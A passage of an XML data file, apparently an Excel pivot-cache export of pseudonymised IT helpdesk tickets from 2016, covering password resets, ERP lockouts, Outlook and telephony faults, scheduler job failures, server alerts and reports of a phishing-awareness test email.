    <s v="rbozivdq gmlhrtvp"/>
    <x v="0"/>
  </r>
  <r>
    <s v="blue screen error."/>
    <s v="blue screen error."/>
    <s v="njcxmlbf svlmrqjd"/>
    <x v="0"/>
  </r>
  <r>
    <s v="outlook not responding due to crm error"/>
    <s v="outlook not responding due to crm error"/>
    <s v="esmvgkhb crybuied"/>
    <x v="0"/>
  </r>
  <r>
    <s v="account information updated"/>
    <s v="from: nwfodmhc exurcwkm _x000a_sent: friday, august 19, 2016 6:16 pm_x000a_to: johthryu ko; nwfodmhc exurcwkm_x000a_subject: re: sab : fw: account information updated_x000a__x000a_hello johthryu,_x000a__x000a_this is a mail from company. you can click on the link to access it._x000a__x000a__x000a_aorthyme rnsuipbk_x000a_global service organization (gso)_x000a__x000a_  did you know?_x000a__x000a_ticketing_tool has an extensive self-help knowledgebase with easy to use troubleshooting and how-to articles. _x000a_these have been contributed by it teams as well as by our customers, every time they open a request or an incident with it. so, go ahead and follow the rabbit (click on the image to open the knowledgebase) to explore how you can help yourself with your it issue!_x000a_we appreciate your feedback, please leave a comment on the article you visit or write to the gso._x000a__x000a_global service organization:_x000a_| | help@company.com  _x000a__x000a__x000a__x000a_-----original message-----_x000a_from: johthryu ko _x000a_sent: friday, august 19, 2016 2:25 pm_x000a_to: nwfodmhc exurcwkm_x000a_subject: sab : fw: account information updated_x000a__x000a_hi it experts,_x000a__x000a_pla see below. not sure what it is and therefore not using it._x000a__x000a_best "/>
    <s v="ynsqjehx kqgrsawl"/>
    <x v="0"/>
  </r>
  <r>
    <s v="user locked out of erp SID_34 erp"/>
    <s v="user locked out of erp SID_34 erp"/>
    <s v="fdnohtiy hxdfuplb"/>
    <x v="0"/>
  </r>
  <r>
    <s v="spam or not ?"/>
    <s v="your user account has been updated in ancile uperform. you can log on here: "/>
    <s v="stvpxkbf gqchobaj"/>
    <x v="0"/>
  </r>
  <r>
    <s v="erp SID_34 account lockout"/>
    <s v="erp SID_34 account lockout"/>
    <s v="mdbegvct dbvichlg"/>
    <x v="0"/>
  </r>
  <r>
    <s v="new user id"/>
    <s v="new user id"/>
    <s v="mcpgwduj swvpgiaq"/>
    <x v="0"/>
  </r>
  <r>
    <s v="erp SID_34 account locked."/>
    <s v="erp SID_34 account locked."/>
    <s v="lwbchnga axpqctfr"/>
    <x v="0"/>
  </r>
  <r>
    <s v="mobile device activation"/>
    <s v="from: shhkioaprhkuoash ms _x000d__x000a_sent: friday, august 19, 2016 5:07 pm_x000d__x000a_to: nwfodmhc exurcwkm_x000d__x000a_subject: amar : fw: your mobile device is temporarily blocked from synchronizing using exchange activesync until your administrator usas it access._x000d__x000a_importance: high_x000d__x000a__x000d__x000a_hello,_x000d__x000a__x000d__x000a_request you to  configure outlook to my new iphone i received today._x000d__x000a__x000d__x000a_with "/>
    <s v="peuckbvr tjihmgsv"/>
    <x v="0"/>
  </r>
  <r>
    <s v="e4 license activated. office has to be upgraded to 2016"/>
    <s v="e4 license activated. office has to be upgraded to 2016"/>
    <s v="fwypxqcs twsqoimy"/>
    <x v="0"/>
  </r>
  <r>
    <s v="audio not working"/>
    <s v="_x000a__x000a_contact number .  pc service tag h52gv32_x000a__x000a_summary:i'm not hearing sound from my 2:1 laptop when planning a video.  i use a bluetooth earbud."/>
    <s v="ndaoxbvi szxlciue"/>
    <x v="0"/>
  </r>
  <r>
    <s v="query regarding leaves"/>
    <s v="query regarding leaves"/>
    <s v="ktsulemz wsgoykba"/>
    <x v="0"/>
  </r>
  <r>
    <s v="unable to scroll down ie pages"/>
    <s v="unable to scroll down ie pages"/>
    <s v="dskcobqa tujrvsbc"/>
    <x v="0"/>
  </r>
  <r>
    <s v="job pp_EU_tool_netch_ap1 failed in job_scheduler at: 08/19/2016 09:23:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job pp_EU_tool_netch_ap1 failed in job_scheduler at: 08/19/2016 09:23:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="7"/>
  </r>
  <r>
    <s v="engineering tool does not open."/>
    <s v="engineering tool does not open._x000d__x000a_error log attached."/>
    <s v="ajdcnwtb bvijwxko"/>
    <x v="45"/>
  </r>
  <r>
    <s v="outlook not responding "/>
    <s v="outlook not responding "/>
    <s v="nqdyowsm yqerwtna"/>
    <x v="0"/>
  </r>
  <r>
    <s v="ticket update inplant_851643"/>
    <s v="ticket update inplant_851643"/>
    <s v="fumkcsji sarmtlhy"/>
    <x v="0"/>
  </r>
  <r>
    <s v="when opening business_client, getting the &quot;microsoft.net framdntyework 4.5 not installed&quot; error."/>
    <s v="see attachment"/>
    <s v="ernczpho qkmgvoys"/>
    <x v="0"/>
  </r>
  <r>
    <s v="skype does not open."/>
    <s v="skype does not open."/>
    <s v="qftpazns fxpnytmk"/>
    <x v="0"/>
  </r>
  <r>
    <s v="telephony_software phone system"/>
    <s v="since the new telephony_software update i am now missing the icon on my desktop.  can i have it put back on?"/>
    <s v="dtwuqpmo otupcawz"/>
    <x v="0"/>
  </r>
  <r>
    <s v="reset passwords for patrcja szpilewska using password_management_tool password reset."/>
    <s v="the"/>
    <s v="lmsxcvoz vzhkdpfn"/>
    <x v="16"/>
  </r>
  <r>
    <s v="company-ap-chn-apac-2960-access-sw01 at apac - (m&amp;c) - new plant location are down sicne 8:27 am et on 08/19/16"/>
    <s v="company-ap-chn-apac-2960-access-sw01 at apac - (m&amp;c) - new plant location are down sicne 8:27 am et on 08/19/16"/>
    <s v="dkmcfreg anwmfvlg"/>
    <x v="7"/>
  </r>
  <r>
    <s v="telephony_software didn't full update. an't find the log in."/>
    <s v="need telephony_software to log into phone system to take calls"/>
    <s v="hdfcwmag plxstkad"/>
    <x v="2"/>
  </r>
  <r>
    <s v="new password does not work after password change."/>
    <s v="new password does not work after password change."/>
    <s v="qftpazns fxpnytmk"/>
    <x v="0"/>
  </r>
  <r>
    <s v="ticket update on inplant_852167"/>
    <s v="ticket update on inplant_852167"/>
    <s v="fumkcsji sarmtlhy"/>
    <x v="0"/>
  </r>
  <r>
    <s v="ticket update"/>
    <s v="_x000d__x000a__x000d__x000a_received from: qcxivzag.vyucbagx@gmail.com_x000d__x000a__x000d__x000a_i am checking up on the status of completion for it ticket #inc1541133 - please provide an update and expected completion date?_x000d__x000a__x000d__x000a__x000d__x000a_"/>
    <s v="qcxivzag vyucbagx"/>
    <x v="0"/>
  </r>
  <r>
    <s v="password reset request."/>
    <s v="password reset request."/>
    <s v="pdujfybc bvfdnale"/>
    <x v="0"/>
  </r>
  <r>
    <s v="khspqlnj npgxuzeq called for engineering tool issue"/>
    <s v="khspqlnj npgxuzeq called for engineering tool issue"/>
    <s v="rbozivdq gmlhrtvp"/>
    <x v="0"/>
  </r>
  <r>
    <s v="email spam query"/>
    <s v="email spam query"/>
    <s v="hgzjtkxn xekushwi"/>
    <x v="0"/>
  </r>
  <r>
    <s v="in erp's md04 for 6999065 it show a delivery note 9168075863."/>
    <s v="calling from plant plant_35. in erp's md04 for 6999065 it show a delivery note 9168075863. i deleted this yesterday and vl02n confirms the deletion. yet the delivery note still shows open in md04 with 76 pieces. will you please remove so the 76 pieces are return to stock."/>
    <s v="dsyzveju ivmprauh"/>
    <x v="5"/>
  </r>
  <r>
    <s v="password reset alert from o365"/>
    <s v="password reset alert from o365"/>
    <s v="bfgtnyow dahqfpns"/>
    <x v="0"/>
  </r>
  <r>
    <s v="power surge on hub port prompts"/>
    <s v="i am getting frequent notification of power surge on hub port as attached screenshot in my laptop. kindly check and let me know any action needed to be done to resolve this."/>
    <s v="ujsyzrvw vjuyzcih"/>
    <x v="0"/>
  </r>
  <r>
    <s v="mobile device activation ; company provided"/>
    <s v="mobile device activation ; company provided"/>
    <s v="qhvspezr fvluqczd"/>
    <x v="0"/>
  </r>
  <r>
    <s v="erp log-in update needed urgently please!"/>
    <s v="_x000d__x000a__x000d__x000a_received from: oslzvpgk.nhwsxgpb@gmail.com_x000d__x000a__x000d__x000a_good day,_x000d__x000a__x000d__x000a_please can you do a erp log-in update, so that i can get access to the erp quality management system (SID_1)_x000d__x000a__x000d__x000a__x000d__x000a_"/>
    <s v="oslzvpgk nhwsxgpb"/>
    <x v="0"/>
  </r>
  <r>
    <s v="emails not routing from outlook into telephony_software"/>
    <s v="i am entering this ticket to confirm that emails are not routing in from telephony_software for the cas team in north amerirtca._x000d__x000a_there are already two tickets open for other regions with the same issue._x000d__x000a_incident inc1543124_x000d__x000a_incident inc1543192_x000d__x000a__x000d__x000a_there is also a ticket with i3 open so they investigate from their side.  i3 ticked â€“ 846243"/>
    <s v="vpnxjtyz wmakhpci"/>
    <x v="6"/>
  </r>
  <r>
    <s v="support fÃ¼r osterwalder \niptbwdq csenjruz"/>
    <s v="support fÃ¼r osterwalder \niptbwdq csenjruz"/>
    <s v="niptbwdq csenjruz"/>
    <x v="24"/>
  </r>
  <r>
    <s v="ess login issue : password issue."/>
    <s v="ess login issue : password issue."/>
    <s v="mzqgobhv pebimhfz"/>
    <x v="0"/>
  </r>
  <r>
    <s v="unlock account  email  in cell phone the users fernando fillipini, zspvxrfk xocyhnkf and fabio rghkiriuytes"/>
    <s v="hello team,_x000d__x000a__x000d__x000a_could you please unlock account  email  in cell phone the users:_x000d__x000a__x000d__x000a_owdrqmit.nhdzcuji@gmail.com_x000d__x000a_zspvxrfk.xocyhnkf@gmail.com_x000d__x000a_gtdxpofz.xnksbrwl@gmail.com_x000d__x000a__x000d__x000a_"/>
    <s v="qasdhyzm yuglsrwx"/>
    <x v="0"/>
  </r>
  <r>
    <s v="ref#prb1151148 - cannot connect to dynamic excel from msd crm"/>
    <s v="_x000d__x000a__x000d__x000a_received from: vndwmyiz.cjwqtzai@gmail.com_x000d__x000a__x000d__x000a_hi,_x000d__x000a__x000d__x000a_please run the below commands (with administrator privilege) on the computer of the users impacted and whom its working well and send me the results for further analysis._x000d__x000a__x000d__x000a_gpresult /v &gt;log.txt_x000d__x000a_gpresult /h loghtml.html /f_x000d__x000a__x000d__x000a_best "/>
    <s v="vndwmyiz cjwqtzai"/>
    <x v="0"/>
  </r>
  <r>
    <s v="vpn is not connecting."/>
    <s v="vpn is not connecting."/>
    <s v="pfmcnahv ofzlusri"/>
    <x v="0"/>
  </r>
  <r>
    <s v="switch &quot;company-eu-deu-germany-e-b16-gf-3550-access-sw03&quot; at germany is down since 3:12am et 08/16."/>
    <s v="switch &quot;company-eu-deu-germany-e-b16-gf-3550-access-sw03&quot; at germany is down since 3:12am et 08/16."/>
    <s v="uvrbhlnt bjrmalzi"/>
    <x v="7"/>
  </r>
  <r>
    <s v="email"/>
    <s v="_x000d__x000a__x000d__x000a_received from: qdbmspxf.nqdyiclk@gmail.com_x000d__x000a__x000d__x000a_is this a legitimate email?_x000d__x000a_i did not want to click on it without knowing._x000d__x000a_"/>
    <s v="qdbmspxf nqdyiclk"/>
    <x v="0"/>
  </r>
  <r>
    <s v="outlook email update issue"/>
    <s v="outlook email update issue"/>
    <s v="qrnusygw amiebrlf"/>
    <x v="0"/>
  </r>
  <r>
    <s v="spam email query"/>
    <s v="spam email query"/>
    <s v="ibtfxemv roezcnmg"/>
    <x v="0"/>
  </r>
  <r>
    <s v="userid  cccplant_119  cannot reset password. please look at the screenshot."/>
    <s v="userid  cccplant_119  cannot reset password. please look at the screenshot."/>
    <s v="hbmwlprq ilfvyodx"/>
    <x v="21"/>
  </r>
  <r>
    <s v="hub, business_client, not working suddenly"/>
    <s v="_x000d__x000a__x000d__x000a_received from: cowsvzel.ryhkefwv@gmail.com_x000d__x000a__x000d__x000a_hi,_x000d__x000a__x000d__x000a_please find the attached screen shot, suddenly the hub, business_client is going blank, when i close all the tab and restarts, it works again_x000d__x000a__x000d__x000a_could you please fix this ._x000d__x000a__x000d__x000a_[cid:image001.png@01d1fa2e.56137811]_x000d__x000a__x000d__x000a_"/>
    <s v="cowsvzel ryhkefwv"/>
    <x v="0"/>
  </r>
  <r>
    <s v="outlook issue."/>
    <s v=": cannot open the item. text formatheywting command is not available"/>
    <s v="ouxtpbcy vimzawtg"/>
    <x v="0"/>
  </r>
  <r>
    <s v="collaboration_platform not synching ."/>
    <s v="collaboration_platform not synching ."/>
    <s v="vkufbxrd zbghvyio"/>
    <x v="0"/>
  </r>
  <r>
    <s v="erp access issue"/>
    <s v="system SID_34_x000d__x000a__x000d__x000a_production employee pevokgiu hdywstbl idrizj from switzerland, switzerland, needs a password reset_x000d__x000a__x000d__x000a_many "/>
    <s v="brjkmwvo odxwcpie"/>
    <x v="19"/>
  </r>
  <r>
    <s v="probleme mit erpgui \tmqfjard qzhgdoua"/>
    <s v="probleme mit erpgui \tmqfjard qzhgdoua"/>
    <s v="tmqfjard qzhgdoua"/>
    <x v="24"/>
  </r>
  <r>
    <s v="alte it equipment abholen . \qvncizuf ueiybanz"/>
    <s v="alte it equipment abholen . \qvncizuf ueiybanz"/>
    <s v="qvncizuf ueiybanz"/>
    <x v="24"/>
  </r>
  <r>
    <s v="monitor defekt \ewew8323542 \pvd1 \bur am orde"/>
    <s v="monitor defekt \ewew8323542 \pvd1 \bur am orde"/>
    <s v="xwirzvda okhyipgr"/>
    <x v="24"/>
  </r>
  <r>
    <s v="please have a look at po. the terms and conditions page should only be printing as the last page to the order. not after"/>
    <s v="please have a look at po. the terms and conditions page should only be printing as the last page to the order. not after each page."/>
    <s v="idlupnzr nkxylwrc"/>
    <x v="29"/>
  </r>
  <r>
    <s v="HostName_973 : : wrong number of instances of process wrapper.exe, expected instances gte 3 but found 0"/>
    <s v="HostName_973 : : wrong number of instances of process wrapper.exe, expected instances gte 3 but found 0"/>
    <s v="spxqmiry zpwgoqju"/>
    <x v="7"/>
  </r>
  <r>
    <s v="emails from common mailbox k-uk.moe@company.com do not appear in telephony_software workflow"/>
    <s v="although there are emails in outlook mailbox, they do not appear in telephony_software."/>
    <s v="kerbmgdu yhbcquwd"/>
    <x v="6"/>
  </r>
  <r>
    <s v="received new laptop. need outlook configuration help."/>
    <s v="received new laptop. need outlook configuration help."/>
    <s v="qrnusygw amiebrlf"/>
    <x v="0"/>
  </r>
  <r>
    <s v="reimbursement amount:    usd 293,34"/>
    <s v=" i need to approve a travel expense...the following expense report has been submitted for your approval:_x000a__x000a_personnel no.:    11131936  (mahtyurch t kutgynka)_x000a_expense report no.:    2711125442_x000a_start date:    21.06.2016 00:01:00_x000a_end date:    18.07.2016 00:01:00_x000a_total costs:    usd 293,34_x000a_reimbursement amount:    usd 293,34_x000a__x000a_to review this expense report in full, please log into your universal worklist on manager self-service._x000a_ but have no rights to view. please help."/>
    <s v="dkinobsv wymgzcrh"/>
    <x v="0"/>
  </r>
  <r>
    <s v="job Job_3053 failed in job_scheduler at: 08/19/2016 03:11:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_3053 failed in job_scheduler at: 08/19/2016 03:11:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="7"/>
  </r>
  <r>
    <s v="job Job_1388 failed in job_scheduler at: 08/19/2016 02:44:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_1388 failed in job_scheduler at: 08/19/2016 02:44:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="8"/>
  </r>
  <r>
    <s v="need access to HostName_768 imts2012 folder"/>
    <s v="_x000d__x000a__x000d__x000a_received from: ybhazlqp.zfghsxiw@gmail.com_x000d__x000a__x000d__x000a_hello it team,_x000d__x000a__x000d__x000a_please usa me access to imts2012 folder on server HostName_768._x000d__x000a__x000d__x000a_"/>
    <s v="ybhazlqp zfghsxiw"/>
    <x v="33"/>
  </r>
  <r>
    <s v="tel. 416 prÃ¼fen"/>
    <s v="tel. 416 prÃ¼fen"/>
    <s v="swfdvezh fpjybetd"/>
    <x v="32"/>
  </r>
  <r>
    <s v="picking request cannot print"/>
    <s v="hi it-team_x000d__x000a__x000d__x000a__x000d__x000a_we have problem picking request print in plant_203._x000d__x000a_below sale order (red so#) cannot print picking request from 17th aug._x000d__x000a_other so# have same problem._x000d__x000a__x000d__x000a_csr person print picking request print manual operate._x000d__x000a_not automatic print it._x000d__x000a__x000d__x000a_please help us aerp_x000d__x000a__x000d__x000a__x000d__x000a_best "/>
    <s v="nkiopevt gufwhdky"/>
    <x v="17"/>
  </r>
  <r>
    <s v="please change to the japanese."/>
    <s v="hi,_x000d__x000a__x000d__x000a_it is a screen of the sales order._x000d__x000a_please change to the japanese._x000d__x000a_there is also when the ship-to is displayed in japanese._x000d__x000a_domestic customers want to display in japanese._x000d__x000a__x000d__x000a_best "/>
    <s v="uxndyfrs vahxnfgl"/>
    <x v="12"/>
  </r>
  <r>
    <s v="account information updated"/>
    <s v="hi,_x000d__x000a__x000d__x000a_one more spam mail. please check._x000d__x000a__x000d__x000a_"/>
    <s v="vrjwyqtf qoxkapfw"/>
    <x v="0"/>
  </r>
  <r>
    <s v="disable mail functionality of payment advice"/>
    <s v="_x000a_from: gnasmtvx cwxtsvkm _x000a_sent: friday, august 19, 2016 10:40 am_x000a_to: pradyhtueep yyufs; nathyresh gayhtjula; lakhsynrhty p_x000a_cc: raghyvhdra najuty_x000a_subject: re: automatic payment through bank_x000a__x000a_ksp/ng,_x000a__x000a_we request you to please disable the mail functionality of payment advice for the time being until we find the solutions for both printing &amp; mail functionality._x000a__x000a_"/>
    <s v="gnasmtvx cwxtsvkm"/>
    <x v="9"/>
  </r>
  <r>
    <s v="msd crm-6500072137"/>
    <s v="i can not change the qty in crm syatem, would you help me change the qty as below_x000d__x000a_4977815 7pcs_x000d__x000a_4977812 5pcs "/>
    <s v="hrqvkemg dmcxbrqj"/>
    <x v="14"/>
  </r>
  <r>
    <s v="nigktly erp download for germany, plant_170 is waiting for date since more than one day."/>
    <s v="job hangs at step 2, this step waits for 4 files  from erp in \\edksm005\EU_tool-daten, coming in a ziped file. please check, whether the relazed erp-jobs are running properly_x000a__x000a_phone: +49 _x000a_email(skype buissness external conact) iewnguxv.bufwxeiy@gmail.com"/>
    <s v="iewnguxv bufwxeiy"/>
    <x v="58"/>
  </r>
  <r>
    <s v="credit component is not working in prod author"/>
    <s v="credit component is not working in prod author. we are getting the following error in the console: _x000d__x000a__x000d__x000a_(programdnty):24 uncaught referenceerror: $xiframdntye is not definedsubmitform @ (programdnty):24(anonymous function) @ (programdnty):74dispatch @ jquery.min.js:3i @ jquery.min.js:3_x000d__x000a__x000d__x000a_"/>
    <s v="lenxvcbq vwnhjtoi"/>
    <x v="50"/>
  </r>
  <r>
    <s v="laptop screen flickering "/>
    <s v="hello team,_x000d__x000a__x000d__x000a_my laptop monitor screen flickers more often when i start my laptop."/>
    <s v="nvxkdqfi slkojtcg"/>
    <x v="18"/>
  </r>
  <r>
    <s v="business_client SID_1 search_server not working"/>
    <s v="hi, i can find documents in engineering tool SID_1. but not in business_client SID_1.  search_server is not working. request you to check for indexing and do the needful as we need to do some uacyltoe hxgayczeing in business_client SID_1."/>
    <s v="aqourvgz mkehgcdu"/>
    <x v="13"/>
  </r>
  <r>
    <s v="job bkbackup_tool_reporting_tool_prod_inc failed in job_scheduler at: 08/19/2016 00:18:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job bkbackup_tool_reporting_tool_prod_inc failed in job_scheduler at: 08/19/2016 00:18:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="7"/>
  </r>
  <r>
    <s v="job bkbackup_tool_HostName_771_prod_full failed in job_scheduler at: 08/19/2016 00:05:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job bkbackup_tool_HostName_771_prod_full failed in job_scheduler at: 08/19/2016 00:05:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="7"/>
  </r>
  <r>
    <s v="change payment terms  for emea vendors - only accounting view from v169 to v301"/>
    <s v="_x000d__x000a__x000d__x000a_received from: blktuiae.jzakfmhw@gmail.com_x000d__x000a__x000d__x000a_dear it_x000d__x000a__x000d__x000a_please create a ticket to update the emea vendor master file from v169 to v301_x000d__x000a_move the ticket to nahytua  or another available colleague_x000d__x000a__x000d__x000a_only  accounting view_x000d__x000a__x000d__x000a_should be done today; very urgent_x000d__x000a__x000d__x000a_"/>
    <s v="blktuiae jzakfmhw"/>
    <x v="9"/>
  </r>
  <r>
    <s v="loan switch"/>
    <s v="help to install the loan switch and lan cable  on newly created cubicle."/>
    <s v="nawkpdtx gwcvmbhn"/>
    <x v="18"/>
  </r>
  <r>
    <s v="keybankrd/accident damage hinge cover"/>
    <s v="windows key and q key is not working and also there is accidental damage on hinge."/>
    <s v="kflqpite gbeoqsnc"/>
    <x v="18"/>
  </r>
  <r>
    <s v="unable to download files from gpts"/>
    <s v="unable to download files from gpts"/>
    <s v="janivrtg hstolemu"/>
    <x v="0"/>
  </r>
  <r>
    <s v="need uasername and password of  .telephony_software-server@company.com and .telephony_software-server@company.com for ewseditor uacyltoe hxgaycze"/>
    <s v="emails of australia team not polling into telephony_software.  so far, they have to work via outlook._x000d__x000a_i3 engineer need to do ewseditor uacyltoe hxgaycze and ask us to provide the username and password for the qlhmawgi sgwipoxn .telephony_software-server@company.com and .telephony_software-server@company.com ."/>
    <s v="zupifghd vdqxepun"/>
    <x v="6"/>
  </r>
  <r>
    <s v="windows locked"/>
    <s v="_x000a__x000a_received from: nmgesubf.wugbalmy@gmail.com_x000a__x000a_hi,_x000a__x000a_   following user id (winows) is locked, pl. help._x000a__x000a_user id : dsilvfgj,_x000a__x000a__x000a_"/>
    <s v="nmgesubf wugbalmy"/>
    <x v="0"/>
  </r>
  <r>
    <s v="the finance_app application is reporting a : down status on, HostName_1132. since 8/18/2016 5:29 pm est"/>
    <s v="the finance_app hfm server is reporting a : down status on, HostName_1132. since 8/18/2016 5:29 pm est"/>
    <s v="spxqmiry zpwgoqju"/>
    <x v="11"/>
  </r>
  <r>
    <s v="why the changed weight of the mm hasn't been copied to the sales order?"/>
    <s v="we met the weight problem when make shipment to order 35410210, shipping plant complained the weight in d/n for some of mms still remain 11.111g( dummy weight for a new mm). but actually the weight of the mm has already be updated at mm02 to the real weight before dn created. so why system cannot carry out the new weight to the sales order? see samples mm7316889 in this s/o._x000d__x000a_the mm changes recorded said the weight was updated from 11.111g to 500g on june 21 2016, however the s/o still keep 11.111g so when plant_185 run d/n on aug. 10 2016, the weight in d/n still shown 11.111g thus warehouse have to manual update the weight in d/n._x000d__x000a_please verify what's the problem, "/>
    <s v="urfdkvei bfiulzto"/>
    <x v="12"/>
  </r>
  <r>
    <s v="è½¬å‘: ç”³è¯·é€€æ¢è´§ï¼Œè´¨é‡æŠ•è¯‰ï¼Œ external complaints 7611183180 status assigned"/>
    <s v="_x000a__x000a_received from: pkdavqwt.tafrmxsh@gmail.com_x000a__x000a_hello it team,_x000a_can we add receiving address, contact person &amp; tel. number on return form?_x000a__x000a_letgyo jiftg_x000a_logistics manager_x000a__x000a_e: pkdavqwt.tafrmxsh@gmail.com&lt;mailto:pkdavqwt.tafrmxsh@gmail.com&gt;_x000a__x000a_å‘ä»¶äºº: johthryugftyson hu_x000a_å‘é€æ—¶é—´: 2016å¹´8æœˆ18æ—¥ 10:22_x000a_æ”¶ä»¶äºº: letgyo jiftg; east service_x000a_æŠ„é€: simfghon wanrtyg_x000a_ä¸»é¢˜: re: ç”³è¯·é€€æ¢è´§ï¼Œè´¨é‡æŠ•è¯‰ï¼Œ external complaints 7611183180 status assigned_x000a__x000a_leoï¼Œ_x000a__x000a_please check with it if it's possible to add the warehouse person for receiving return (for plant_283:  judthti zhu and her office tel#)_x000a_to the return form attached_x000a__x000a_"/>
    <s v="pkdavqwt tafrmxsh"/>
    <x v="14"/>
  </r>
  <r>
    <s v="need access to global t drive"/>
    <s v="_x000d__x000a__x000d__x000a_received from: uycravzn.feqlznyg@gmail.com_x000d__x000a__x000d__x000a_as i have been asked to put together traiyctrhbkm plvnuxmrterial for the imts show, i will need access to the global t drive (\\HostName_768\teams\imts2012\pre-show-product-training&lt;file://HostName_768/teams/imts2012/pre-show-product-training&gt;), which i do not currently have._x000d__x000a__x000d__x000a_best "/>
    <s v="uycravzn feqlznyg"/>
    <x v="33"/>
  </r>
  <r>
    <s v="ticket update info provided to vksfrhdx njhaqket for bobj access"/>
    <s v="from: rakthyesh ramdntythanjesh _x000a_sent: friday, august 19, 2016 5:52 am_x000a_to: vksfrhdx njhaqket; ctzykflo evzbhgru_x000a_cc: hadfiunr vupglewt; wvdxnkhf jirecvta; anftgup nftgyair_x000a_subject: re: bobj access _x000a__x000a_dear marftgytin,_x000a__x000a_yes,  request is  processed , completed and closed by anup_x000a__x000a_reference ticket no-ticket_no1536921_x000a__x000a_kind "/>
    <s v="eqzibjhw ymebpoih"/>
    <x v="0"/>
  </r>
  <r>
    <s v="uacyltoe hxgaycze phishing email-account information updated"/>
    <s v="from: rakthyesh ramdntythanjesh _x000a_sent: friday, august 19, 2016 5:40 am_x000a_to: ed bigdrtyh_x000a_subject: re: account information updated_x000a__x000a_dear ed,_x000a__x000a_hope you are doing good,_x000a__x000a_please note that this is a phishing uacyltoe hxgaycze email sent out by it to uacyltoe hxgaycze our preparedness for actual scenarios._x000a__x000a_congratuldhyation  on detecting and highlighting the issue, "/>
    <s v="lomzfqns htznsgdf"/>
    <x v="0"/>
  </r>
  <r>
    <s v="uacyltoe hxgaycze phishing email-account information updated"/>
    <s v="from: rakthyesh ramdntythanjesh _x000d__x000a_sent: friday, august 19, 2016 5:39 am_x000d__x000a_to: sunil gavasane_x000d__x000a_subject: re: account information updated_x000d__x000a__x000d__x000a_dear sunil,_x000d__x000a__x000d__x000a__x000d__x000a_hope you are doing good,_x000d__x000a__x000d__x000a_please note that this is a phishing uacyltoe hxgaycze email sent out by it to uacyltoe hxgaycze our preparedness for actual scenarios._x000d__x000a__x000d__x000a_congratuldhyation  on detecting and highlighting the issue, "/>
    <s v="ulroqsyf wctpnarb"/>
    <x v="0"/>
  </r>
  <r>
    <s v="see attachment discritpion does not show"/>
    <s v="the discription shows correctly for mmaster but not for me. ??"/>
    <s v="lzspyjki smdbqnef"/>
    <x v="29"/>
  </r>
  <r>
    <s v="HostName_1003: average (4 samples) disk free on e:\ is now 14%, which is below the warning threshold (15%)"/>
    <s v="HostName_1003: average (4 samples) disk free on e:\ is now 14%, which is below the warning threshold (15%) out of total size 100.0 gb"/>
    <s v="vbwszcqn nlbqsuyv"/>
    <x v="11"/>
  </r>
  <r>
    <s v="HostName_898: average (4 samples) disk free on f:\ is now 14%, which is below the warning threshold (15%) "/>
    <s v="HostName_898: average (4 samples) disk free on f:\ is now 14%, which is below the warning threshold (15%) out of total size 8.0 gb"/>
    <s v="vbwszcqn nlbqsuyv"/>
    <x v="38"/>
  </r>
  <r>
    <s v="emails are not being sent from the .net systemaccess applicaiton"/>
    <s v="end-users are submitting security requests, but the approvers are not receiving emails from the systemaccess application to approve them."/>
    <s v="mwegknsq xzgskryv"/>
    <x v="25"/>
  </r>
  <r>
    <s v="solicito imagens da frente do cd visando avaliar furto de motor de betoneira"/>
    <s v="perÃ­odo: das 12h00 de 15/08 atÃ© 12h00 de 18/08/2016"/>
    <s v="dughqrnf mebofqhz"/>
    <x v="62"/>
  </r>
  <r>
    <s v="unable to log in to skype "/>
    <s v="unable to log in to skype "/>
    <s v="klsrmzvq otsdnmzk"/>
    <x v="0"/>
  </r>
  <r>
    <s v="blank call"/>
    <s v="blank call"/>
    <s v="fumkcsji sarmtlhy"/>
    <x v="0"/>
  </r>
  <r>
    <s v="printer driver update"/>
    <s v="printer driver update"/>
    <s v="cgqfdotb wtefjknd"/>
    <x v="0"/>
  </r>
  <r>
    <s v="usa: interfacetengigabitethernet1/1/1 is down since 02:30pm et on 08/17"/>
    <s v="usa: interfacetengigabitethernet1/1/1, dr l3 connection to 6500 top(10.1.200.1) on tech-4500x-stack.company.com is down since 02:30pm et on 08/17"/>
    <s v="vbwszcqn nlbqsuyv"/>
    <x v="3"/>
  </r>
  <r>
    <s v="engineering tool icon on the desktop"/>
    <s v="engineering tool icon on the desktop"/>
    <s v="rolcgqhx ehndjmlv"/>
    <x v="0"/>
  </r>
  <r>
    <s v="request to reset microsoft online services password for aparecido"/>
    <s v="from: microsoft on behalf of company inc. [mailto:msonlineservicesteam@microsoftonline.com] _x000a_sent: thursday, august 18, 2016 10:54 pm_x000a_to: nwfodmhc exurcwkm_x000a_cc: tiyhum kuyiomar_x000a_subject: amar request to reset microsoft online services password for recsynqt.byoezmla@gmail.com_x000a_importance: high_x000a__x000a_    request to reset user's password   _x000a_   the following user in your organization has requested a password reset be performed for their account: _x000a__x000a_â€¢ recsynqt.byoezmla@gmail.com _x000a_â€¢ first name: aparecido _x000a_â€¢ last name: trhsyvdur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recsynqt byoezmla"/>
    <x v="0"/>
  </r>
  <r>
    <s v="i'm trying to access crm through ess but getting message password has expired. i tried password_management_tool password manager "/>
    <s v="i'm trying to access crm through ess but getting message password has expired. i tried password_management_tool password manager and unlocked all accounts. i rebooted pc. tried password manager again"/>
    <s v="pzrskcon pobsajnx"/>
    <x v="0"/>
  </r>
  <r>
    <s v="HostName_106: c:\ on server: HostName_106 is over 85% space consumed. space available: 2.8 g"/>
    <s v="HostName_106: volume: c:\ label:sys-HostName_106 5c38eea1 on server: HostName_106 is over  85% space consumed. space available: 2.8 g "/>
    <s v="vbwszcqn nlbqsuyv"/>
    <x v="11"/>
  </r>
  <r>
    <s v="unable to get the sales org in distributor_tool "/>
    <s v="unable to get the sales org in distributor_tool "/>
    <s v="bonwcpea cwfbjptn"/>
    <x v="0"/>
  </r>
  <r>
    <s v="while trying to invoke the method java.util.list.iterator() of a null object loaded from a local variable 'locallist'"/>
